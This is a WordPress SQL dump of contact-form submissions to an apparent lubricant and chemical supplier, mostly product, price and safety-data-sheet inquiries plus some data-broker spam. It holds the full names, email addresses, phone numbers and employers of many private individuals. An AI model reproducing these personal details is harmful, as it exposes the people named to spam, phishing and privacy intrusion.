INSERT INTO `wp_postmeta` VALUES (31754, 3546, '_sub_id', '3546'); 
INSERT INTO `wp_postmeta` VALUES (31755, 3547, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31756, 3547, '_seq_num', '289'); 
INSERT INTO `wp_postmeta` VALUES (31757, 3547, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31758, 3547, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31759, 3547, '_field_1', 'Jennifer johnson'); 
INSERT INTO `wp_postmeta` VALUES (31760, 3547, '_field_10', 'Scott Safety'); 
INSERT INTO `wp_postmeta` VALUES (31761, 3547, '_field_2', 'Jenjohnson@tycoint.com'); 
INSERT INTO `wp_postmeta` VALUES (31762, 3547, '_field_8', '(704) 296-3315'); 
INSERT INTO `wp_postmeta` VALUES (31763, 3547, '_field_3', 'I need the price for a gallon of the MS-722 please.\r\n\r\nThank you!'); 
INSERT INTO `wp_postmeta` VALUES (31764, 3547, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31765, 3547, '_sub_id', '3547'); 
INSERT INTO `wp_postmeta` VALUES (31766, 3548, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31767, 3548, '_seq_num', '290'); 
INSERT INTO `wp_postmeta` VALUES (31768, 3548, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31769, 3548, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31770, 3548, '_field_1', 'Frank Johnson'); 
INSERT INTO `wp_postmeta` VALUES (31771, 3548, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (31772, 3548, '_field_2', 'portdenaraustorefiji@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (31773, 3548, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (31774, 3548, '_field_3', 'Dear Sales,\r\n\r\nWe are interested in purchasing some of your products to Fiji Island,can you send us complete catalog ?also be informed that our mode of payment for this order is via credit card.\r\n\r\nwe anticipate,your prompt reply.\r\n\r\nKind Regards\r\nFrank Johnson\r\nPort Denarau Shopping Centre\r\nAddress: Denarau Island, Fiji Island\r\nEmail:portdenaraustorefiji@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (31775, 3548, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31776, 3548, '_sub_id', '3548'); 
INSERT INTO `wp_postmeta` VALUES (31777, 3549, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31778, 3549, '_seq_num', '291'); 
INSERT INTO `wp_postmeta` VALUES (31779, 3549, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31780, 3549, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31781, 3549, '_field_1', 'Amber Winters'); 
INSERT INTO `wp_postmeta` VALUES (31782, 3549, '_field_10', 'Prime Data Services Inc.'); 
INSERT INTO `wp_postmeta` VALUES (31783, 3549, '_field_2', 'amber@primedataservices.com'); 
INSERT INTO `wp_postmeta` VALUES (31784, 3549, '_field_8', '(515) 861-6600'); 
INSERT INTO `wp_postmeta` VALUES (31785, 3549, '_field_3', 'Hi,\r\n\r\nHope you are having good day.\r\n\r\nI wanted to reach out and check whether you are interested in acquiring database of various sectors mentioned below:\r\n\r\n01-09 Agriculture, Forestry, Fishing\r\n10-14 Mining\r\n15-17 Construction\r\n20-39 Manufacturing\r\n40-49 Transportation &amp; Public Utilities\r\n50-51 Wholesale Trade\r\n52-59 Retail Trade\r\n60-67 Finance, Insurance, Real Estate\r\n70-89 Services\r\n91-99 Public Administration\r\n\r\nJob Titles: Manager/VP (Technical / Engineering / Quality), Manager/VP (Research / Development), Manager/VP (Finance), Accounting director, Controller - financial services, Director of accounting, Financial manager,  Director/Officer and Sr. Partner/Sr. Director, Senior Analyst, Maintenance and service manager, Plant maintenance manager and many more..\r\n\r\nLook forward to your response.\r\n\r\nRegards,\r\nAmber Winters\r\nMarketing Manager'); 
INSERT INTO `wp_postmeta` VALUES (31786, 3549, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31787, 3549, '_sub_id', '3549'); 
INSERT INTO `wp_postmeta` VALUES (31788, 3550, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31789, 3550, '_seq_num', '292'); 
INSERT INTO `wp_postmeta` VALUES (31790, 3550, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31791, 3550, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31792, 3550, '_field_1', 'John Schleider'); 
INSERT INTO `wp_postmeta` VALUES (31793, 3550, '_field_10', 'JS Tech Service, LLC'); 
INSERT INTO `wp_postmeta` VALUES (31794, 3550, '_field_2', 'JS.Tech@comcast.net'); 
INSERT INTO `wp_postmeta` VALUES (31795, 3550, '_field_8', '(610) 547-3090'); 
INSERT INTO `wp_postmeta` VALUES (31796, 3550, '_field_3', 'I&#039;m interested to know of what equivalent lubricant you make that is similar to an LY694 type. I&#039;m supporting systems which have stepper-motors and the manufacturer recommends the LY694 type to lubricate the bearings within. The motors have been in use for at least 10 years and thus may have some older lubricant to displace as some of the motors get this &quot;stiction&quot; failure where the positioning is off due to what seems like &quot;sticky points&quot; when manually rotating the motor shaft (while powered-Off and no tension). Considering that the problem is more notable in colder weather (below freezing), it would seem the problem may be of old lubricant needing to be replaced as opposed to rusted bearings. Though it could be a bit of both.\r\n\r\nIn short, I&#039;m looking for any recommendations or lubricant suggestions as well as where to find them (stores, distributors, etc).\r\n\r\nThanks,\r\nJS'); 
INSERT INTO `wp_postmeta` VALUES (31797, 3550, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31798, 3550, '_sub_id', '3550'); 
INSERT INTO `wp_postmeta` VALUES (31799, 3551, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31800, 3551, '_seq_num', '293'); 
INSERT INTO `wp_postmeta` VALUES (31801, 3551, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31802, 3551, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31803, 3551, '_field_1', 'Deryk Parsons'); 
INSERT INTO `wp_postmeta` VALUES (31804, 3551, '_field_10', 'QuEST Global'); 
INSERT INTO `wp_postmeta` VALUES (31805, 3551, '_field_2', 'deryk.parsons@pw.utc.com'); 
INSERT INTO `wp_postmeta` VALUES (31806, 3551, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (31807, 3551, '_field_3', 'To whom it may concern:\n\nI’m a project engineer working on the REACH Project on behalf of Pratt and Whitney. \nI would like to request the MSDS information for one of your products; MS-122B.\n\nPlease contact me by the email or phone number listed below if you have any additional questions. \nThank you.\n\nBest regards,\nDeryk Parsons\n'); 
INSERT INTO `wp_postmeta` VALUES (31808, 3551, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31809, 3551, '_sub_id', '3551'); 
INSERT INTO `wp_postmeta` VALUES (31810, 3552, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (31811, 3552, '_seq_num', '212'); 
INSERT INTO `wp_postmeta` VALUES (31812, 3552, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31813, 3552, '_field_12', 'Kate Tu'); 
INSERT INTO `wp_postmeta` VALUES (31814, 3552, '_field_13', 'Ellsworth Adhesives'); 
INSERT INTO `wp_postmeta` VALUES (31815, 3552, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (31816, 3552, '_field_14', 'ktu@ellsworth.com'); 
INSERT INTO `wp_postmeta` VALUES (31817, 3552, '_field_15', '(949) 265-7649'); 
INSERT INTO `wp_postmeta` VALUES (31818, 3552, '_field_16', 'Hello Tech. Service,\n\nI understand the MS-143H is discontinued and no longer available.  Please advise if there a replacement product for the MS-143H?  If so, please also provide TDS and SDS.\n\nThank you for your help.\n\nRegards,\nKate Tu'); 
INSERT INTO `wp_postmeta` VALUES (31819, 3552, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (31820, 3552, '_sub_id', '3552'); 
INSERT INTO `wp_postmeta` VALUES (31821, 3553, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (31822, 3553, '_seq_num', '213'); 
INSERT INTO `wp_postmeta` VALUES (31823, 3553, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31824, 3553, '_field_12', 'Sergiy Dets'); 
INSERT INTO `wp_postmeta` VALUES (31825, 3553, '_field_13', 'SMART Technologies'); 
INSERT INTO `wp_postmeta` VALUES (31826, 3553, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (31827, 3553, '_field_14', 'sergiydets@smarttech.com'); 
INSERT INTO `wp_postmeta` VALUES (31828, 3553, '_field_15', '(403) 407-4060'); 
INSERT INTO `wp_postmeta` VALUES (31829, 3553, '_field_16', 'Does Krytox offer solution to reduce friction between snow and ultra-hight molecular weight polyethylene?\r\nWhich product form would be recommended? Thank you!'); 
INSERT INTO `wp_postmeta` VALUES (31830, 3553, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (31831, 3553, '_sub_id', '3553'); 
INSERT INTO `wp_postmeta` VALUES (31832, 3554, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31833, 3554, '_seq_num', '294'); 
INSERT INTO `wp_postmeta` VALUES (31834, 3554, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31835, 3554, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31836, 3554, '_field_1', 'Kane Evans'); 
INSERT INTO `wp_postmeta` VALUES (31837, 3554, '_field_10', 'Halliburton'); 
INSERT INTO `wp_postmeta` VALUES (31838, 3554, '_field_2', 'kane.evans@halliburton.com'); 
INSERT INTO `wp_postmeta` VALUES (31839, 3554, '_field_8', '(044) 164-8551'); 
INSERT INTO `wp_postmeta` VALUES (31840, 3554, '_field_3', 'Hi we have some MS-122AD PTFE release agent which is held in our stock and we need to use it. Can you tell me if it has a shelf life? if so can it be used past this date? is it a best before  date rather than a do not use after date?\nregards Kane'); 
INSERT INTO `wp_postmeta` VALUES (31841, 3554, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31842, 3554, '_sub_id', '3554'); 
INSERT INTO `wp_postmeta` VALUES (31843, 3555, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31844, 3555, '_seq_num', '295'); 
INSERT INTO `wp_postmeta` VALUES (31845, 3555, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31846, 3555, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31847, 3555, '_field_1', 'Cathryn Schartung-Doud'); 
INSERT INTO `wp_postmeta` VALUES (31848, 3555, '_field_10', 'AMRDEC'); 
INSERT INTO `wp_postmeta` VALUES (31849, 3555, '_field_2', 'cathryn.m.schartung-doud.civ@mail.mil'); 
INSERT INTO `wp_postmeta` VALUES (31850, 3555, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (31851, 3555, '_field_3', 'I am looking for the SDS for MS-180 Freon TF Solvent.'); 
INSERT INTO `wp_postmeta` VALUES (31852, 3555, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31853, 3555, '_sub_id', '3555'); 
INSERT INTO `wp_postmeta` VALUES (31854, 3556, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31855, 3556, '_seq_num', '296'); 
INSERT INTO `wp_postmeta` VALUES (31856, 3556, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31857, 3556, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31858, 3556, '_field_1', 'Paul Mackey'); 
INSERT INTO `wp_postmeta` VALUES (31859, 3556, '_field_10', 'Patheon Biologics LLC'); 
INSERT INTO `wp_postmeta` VALUES (31860, 3556, '_field_2', 'paul.mackey@patheon.com'); 
INSERT INTO `wp_postmeta` VALUES (31861, 3556, '_field_8', '(314) 733-3405'); 
INSERT INTO `wp_postmeta` VALUES (31862, 3556, '_field_3', 'Interested  in  a biocompatabile lubricant to replace Dow 111 silicone grease in assembly of bioprocess equipment.'); 
INSERT INTO `wp_postmeta` VALUES (31863, 3556, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31864, 3556, '_sub_id', '3556'); 
INSERT INTO `wp_postmeta` VALUES (31865, 3557, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31866, 3557, '_seq_num', '297'); 
INSERT INTO `wp_postmeta` VALUES (31867, 3557, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31868, 3557, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31869, 3557, '_field_1', 'JHONNY D&#039;ONZA'); 
INSERT INTO `wp_postmeta` VALUES (31870, 3557, '_field_10', 'GLOBAL IMPORT FM inc'); 
INSERT INTO `wp_postmeta` VALUES (31871, 3557, '_field_2', 'jhonnydonza072@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (31872, 3557, '_field_8', '(507) 612-7652'); 
INSERT INTO `wp_postmeta` VALUES (31873, 3557, '_field_3', 'GOOD MORNING, \r\nI NEED TO KNOW IF YOU HAVE THESE PRODUCTS.\r\n\r\n\r\nQTY\r\n20    BARREL OF OIL 15W50 ULTRADIESEL\r\n20    BARREL OIL DEXRON III AUTOMATIC BOX\r\n20    BARREL OF OIL 80W140 FOR TRANSMISSIONS\r\n20    BARREL OF REFRIGERANT FOR CUMMINS ENGINES\r\n20    BARREL OF GREASE EP-2'); 
INSERT INTO `wp_postmeta` VALUES (31874, 3557, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31875, 3557, '_sub_id', '3557'); 
INSERT INTO `wp_postmeta` VALUES (31876, 3558, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31877, 3558, '_seq_num', '298'); 
INSERT INTO `wp_postmeta` VALUES (31878, 3558, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31879, 3558, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31880, 3558, '_field_1', 'Greg Foreman'); 
INSERT INTO `wp_postmeta` VALUES (31881, 3558, '_field_10', 'KTX America, Inc'); 
INSERT INTO `wp_postmeta` VALUES (31882, 3558, '_field_2', 'gforeman@ktx-america.com'); 
INSERT INTO `wp_postmeta` VALUES (31883, 3558, '_field_8', '(734) 737-0100'); 
INSERT INTO `wp_postmeta` VALUES (31884, 3558, '_field_3', 'Hello, I would like know and obtain detail information on this product and safety use of this Epoxy Stripping Agent. Our company is looking for a easy safe way to remove cured epoxy resin that&#039;s used inside some industrial tooling. The epoxy used is Manufactured in Japan by Nissin  Resin Co. 2part epoxy # RT-408AN/RT-408BN is the epoxy used, from my knowledge..According to Nissin it has be recommended to use Methylene Chloride or Methyl Alcohol that is highly toxin to use and something I don&#039;t feel comfortable using do to the hazards of these chemicals. '); 
INSERT INTO `wp_postmeta` VALUES (31885, 3558, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31886, 3558, '_sub_id', '3558'); 
INSERT INTO `wp_postmeta` VALUES (31887, 3559, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31888, 3559, '_seq_num', '299'); 
INSERT INTO `wp_postmeta` VALUES (31889, 3559, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31890, 3559, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31891, 3559, '_field_1', 'Jenny Collins'); 
INSERT INTO `wp_postmeta` VALUES (31892, 3559, '_field_10', 'Sublime Data Inc.'); 
INSERT INTO `wp_postmeta` VALUES (31893, 3559, '_field_2', 'jenny@sublimedata.us'); 
INSERT INTO `wp_postmeta` VALUES (31894, 3559, '_field_8', '5158616600'); 
INSERT INTO `wp_postmeta` VALUES (31895, 3559, '_field_3', 'Hi,\r\n\r\nI hope this email finds you well.\r\n\r\nWe are specialized in B2B Contacts which helps you in exponential market growth. Would you be interested in reaching out to contacts who might be looking for your services and products?\r\n\r\nWe have complete contact details of various key decision makers in every sectors such as C-level, VP level, Director level, manager level, Engineers, Distributors, manufacturer, Sales Professionals, Business Owners and all manner of people from various industries who might be interested in your product/services.\r\n\r\nPlease send me your exact Target folks to understand your needs better so that i can provide you counts available with us:-\r\n\r\nTarget Job Title :- _____\r\nTarget Audience :- _____\r\nTarget Geography :- _____\r\n\r\nLooking Forward to your Positive response.\r\n\r\nJenny'); 
INSERT INTO `wp_postmeta` VALUES (31896, 3559, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31897, 3559, '_sub_id', '3559'); 
INSERT INTO `wp_postmeta` VALUES (31898, 3560, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31899, 3560, '_seq_num', '300'); 
INSERT INTO `wp_postmeta` VALUES (31900, 3560, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31901, 3560, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31902, 3560, '_field_1', 'FRANCIS CUELLO'); 
INSERT INTO `wp_postmeta` VALUES (31903, 3560, '_field_10', 'FUTURE FIBRES SL'); 
INSERT INTO `wp_postmeta` VALUES (31904, 3560, '_field_2', 'francis@futurefibres.com'); 
INSERT INTO `wp_postmeta` VALUES (31905, 3560, '_field_8', '961452135'); 
INSERT INTO `wp_postmeta` VALUES (31906, 3560, '_field_3', 'Hi\r\ni am Francis, Head of workshop in Future Fibres Valencia ( Spain), i need to buy a resin epson 828 and Epicure 3140 curing agent, is possible that you shell to Spain,  Could you please send me a quotation and minimum quantities. \r\nthanks for your help.\r\n'); 
INSERT INTO `wp_postmeta` VALUES (31907, 3560, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31908, 3560, '_sub_id', '3560'); 
INSERT INTO `wp_postmeta` VALUES (31909, 3561, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31910, 3561, '_seq_num', '301'); 
INSERT INTO `wp_postmeta` VALUES (31911, 3561, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31912, 3561, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31913, 3561, '_field_1', 'DELORIS MCKINNEY'); 
INSERT INTO `wp_postmeta` VALUES (31914, 3561, '_field_10', 'HONEYWELL'); 
INSERT INTO `wp_postmeta` VALUES (31915, 3561, '_field_2', 'deloris.mckinney@honeywell.com'); 
INSERT INTO `wp_postmeta` VALUES (31916, 3561, '_field_8', '(470) 422-4817'); 
INSERT INTO `wp_postmeta` VALUES (31917, 3561, '_field_3', 'please send me a list of your authorized distributors for Dupont Teijin Discovery Drive p/n GPL 202.\nThank you so much,'); 
INSERT INTO `wp_postmeta` VALUES (31918, 3561, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31919, 3561, '_sub_id', '3561'); 
INSERT INTO `wp_postmeta` VALUES (31920, 3562, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31921, 3562, '_seq_num', '302'); 
INSERT INTO `wp_postmeta` VALUES (31922, 3562, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31923, 3562, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31924, 3562, '_field_1', 'Roman Kondratyuk'); 
INSERT INTO `wp_postmeta` VALUES (31925, 3562, '_field_10', 'Ostec'); 
INSERT INTO `wp_postmeta` VALUES (31926, 3562, '_field_2', 'roman.kondratyuk@ostec-group.ru'); 
INSERT INTO `wp_postmeta` VALUES (31927, 3562, '_field_8', '(495) 788-4444'); 
INSERT INTO `wp_postmeta` VALUES (31928, 3562, '_field_3', 'Dear Sirs,\r\n \r\nKindly check possibility of supply epoxy resin systems for electronics that could  substitute for the 2 following systems:\r\n1) ARALDITE CY 5622 GB (Base resin)\r\n    ARADUR HY 1235 (Hardener)\r\n    FLEXIBILISER DY 042 (Flexibilizer)\r\n    ACCELERATOR DY 062 (Accelerator)\r\n2) ARALDITE CY 228-1 (Base resin)\r\n    ARADUR HY 918-1 CH (Hardener)\r\n    FLEXIBILISER DY 042 (Flexibilizer)\r\n    ACCELERATOR DY 062 (Accelerator)\r\n \r\nApplication:\r\nElectrical insulators (switch and apparatus components, pin insulators, bushings, power distribution, current and voltage transformers).\r\n \r\nPotential volumes 10 tons per month\r\n \r\nBest regards,\r\nRoman Kondratyuk \r\n \r\nHead of technical support\r\nTechnological Materials Department\r\nOstec Enterprise Ltd. \r\n121467, Moscow, Russian Federation 5/2, Moldavskaya Str. \r\nTel.:  7(495) 788-44-44 (ext.6337)\r\nFax:  7(495) 788-44-42\r\nE-mail: Roman.Kondratyuk@ostec-group.ru \r\nWebsite: http://eng.ostec-materials.ru/'); 
INSERT INTO `wp_postmeta` VALUES (31929, 3562, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31930, 3562, '_sub_id', '3562'); 
INSERT INTO `wp_postmeta` VALUES (31931, 3563, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (31932, 3563, '_seq_num', '214'); 
INSERT INTO `wp_postmeta` VALUES (31933, 3563, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31934, 3563, '_field_12', 'George Cutler'); 
INSERT INTO `wp_postmeta` VALUES (31935, 3563, '_field_13', 'Wireless Telecom Group'); 
INSERT INTO `wp_postmeta` VALUES (31936, 3563, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (31937, 3563, '_field_14', 'gcutler@wtcom.com'); 
INSERT INTO `wp_postmeta` VALUES (31938, 3563, '_field_15', '(973) 386-9696'); 
INSERT INTO `wp_postmeta` VALUES (31939, 3563, '_field_16', 'Need MSDS for MS-126H connector lubricant'); 
INSERT INTO `wp_postmeta` VALUES (31940, 3563, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (31941, 3563, '_sub_id', '3563'); 
INSERT INTO `wp_postmeta` VALUES (31942, 3564, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (31943, 3564, '_seq_num', '215'); 
INSERT INTO `wp_postmeta` VALUES (31944, 3564, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31945, 3564, '_field_12', 'Michel Castro'); 
INSERT INTO `wp_postmeta` VALUES (31946, 3564, '_field_13', 'Air Liquide México'); 
INSERT INTO `wp_postmeta` VALUES (31947, 3564, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (31948, 3564, '_field_14', 'michel.castro@airliquide.com'); 
INSERT INTO `wp_postmeta` VALUES (31949, 3564, '_field_15', '(866) 156-7017'); 
INSERT INTO `wp_postmeta` VALUES (31950, 3564, '_field_16', 'Good Morning! Our company has in operation different cryogenic pumps which are in contact with oxygen and other gases. I would like you to share the cost and technical data of the lubricating grease DU PONT kRYTOX GPL226 to start your request and have them as technical support.\r\nRegards'); 
INSERT INTO `wp_postmeta` VALUES (31951, 3564, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (31952, 3564, '_sub_id', '3564'); 
INSERT INTO `wp_postmeta` VALUES (31953, 3565, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31954, 3565, '_seq_num', '303'); 
INSERT INTO `wp_postmeta` VALUES (31955, 3565, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31956, 3565, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31957, 3565, '_field_1', 'Mayumi　Ito'); 
INSERT INTO `wp_postmeta` VALUES (31958, 3565, '_field_10', 'Tegara Corporation'); 
INSERT INTO `wp_postmeta` VALUES (31959, 3565, '_field_2', 'mayumi@tegara.com'); 
INSERT INTO `wp_postmeta` VALUES (31960, 3565, '_field_8', '(053) 468-2655'); 
INSERT INTO `wp_postmeta` VALUES (31961, 3565, '_field_3', 'Dear Sirs,\r\n\r\nWe are a sales agency of computer and industrial products in Japan. \r\nWe often import and sell foreign outstanding software and hardware \r\nnot available in Japan to meet our customers needs. \r\nOur customer in Japan - universities, research institutes and so on \r\nhave a difficulty in paying directly to a foreign company, therefore, \r\nthey often would like us to obtain foreign items for them. \r\n\r\nNow we are asked by one of our customers in Japan for a quote\r\nfor the item below.\r\n---------------------------------------------------------------------\r\nItem   : VERSAMID125\r\nQty.   : 1\r\n---------------------------------------------------------------------\r\n\r\nI wonder if we can help the customer with a purchase of the item\r\nas a sales agent. \r\nIf yes, could you provide us with a quote for it, please? \r\n\r\nWe would like to know a procurement lead time and a shipping cost \r\nto Japan also.\r\n\r\nThe shipping address: \r\n--------------------------------------------------------------------\r\nMayumi Ito\r\nTegara Corporation\r\nAddress: 8-3 Hosojima-cho, Naka-ku, Hamamatsu-shi Shizuoka Japan 435-0045\r\nPhone  : +81-53-468-2655\r\n--------------------------------------------------------------------\r\n\r\nAs for payment, we will pay by our corporate credit card or remit by \r\nwire transfer into your bank account in advance. \r\nWhen we place an order, we will send you a PO by fax if required. \r\n\r\nOur company web site:\r\nhttp://www.tegara.com/english/profile.html\r\n\r\nWe look forward to your reply.\r\nThank you !\r\n\r\nKind regards,\r\nMayumi\r\n\r\n\r\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\r\nMayumi Ito mayumi@tegara.com\r\nTegara Corporation\r\n\r\n8-3 Hosojima-cho, Naka-ku,\r\nHamamatsu-shi Shizuoka Japan 435-0045\r\nT 81.53.468.2655  F 81.53.468.2662\r\n\r\n4-14-36 Midori-cho, Yamagata-shi\r\nYamagata Japan 990-0041\r\nT 81.23.627.7861  F 81.23.627.7873\r\n\r\nhttp://www.tegara.com\r\nhttp://www.unipos.net\r\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\r\n'); 
INSERT INTO `wp_postmeta` VALUES (31962, 3565, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31963, 3565, '_sub_id', '3565'); 
INSERT INTO `wp_postmeta` VALUES (31964, 3567, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31965, 3567, '_seq_num', '304'); 
INSERT INTO `wp_postmeta` VALUES (31966, 3567, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31967, 3567, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31968, 3567, '_field_1', 'Mark Lyons'); 
INSERT INTO `wp_postmeta` VALUES (31969, 3567, '_field_10', 'Stokes Institute, University of Limerick'); 
INSERT INTO `wp_postmeta` VALUES (31970, 3567, '_field_2', 'mark.d.lyons@ul.ie'); 
INSERT INTO `wp_postmeta` VALUES (31971, 3567, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (31972, 3567, '_field_3', 'Hi, could you send me a price quote for Krytox 157 FSH. I&#039;m not sure of the pack sizes you supply but initially I&#039;m only after a small amount say 5 - 10 g. I notice that this product has a TSCA (?) notification would this impact on having it shipped to the Republic of Ireland?\r\n\r\nRegards,\r\n\r\nMark'); 
INSERT INTO `wp_postmeta` VALUES (31973, 3567, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31974, 3567, '_sub_id', '3567'); 
INSERT INTO `wp_postmeta` VALUES (31975, 3568, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31976, 3568, '_seq_num', '305'); 
INSERT INTO `wp_postmeta` VALUES (31977, 3568, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31978, 3568, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31979, 3568, '_field_1', 'Noraida Porrata'); 
INSERT INTO `wp_postmeta` VALUES (31980, 3568, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (31981, 3568, '_field_2', 'noraida.porrata@crbard.com'); 
INSERT INTO `wp_postmeta` VALUES (31982, 3568, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (31983, 3568, '_field_3', 'Hello,\n\nThe company I work for will be using product Dry Film RA/ IPA-15.  Does this product have a shelf life / expiration date?\n\nRegards,\nNoraida Porrata\n\n'); 
INSERT INTO `wp_postmeta` VALUES (31984, 3568, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31985, 3568, '_sub_id', '3568'); 
INSERT INTO `wp_postmeta` VALUES (31986, 3569, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31987, 3569, '_seq_num', '306'); 
INSERT INTO `wp_postmeta` VALUES (31988, 3569, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31989, 3569, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
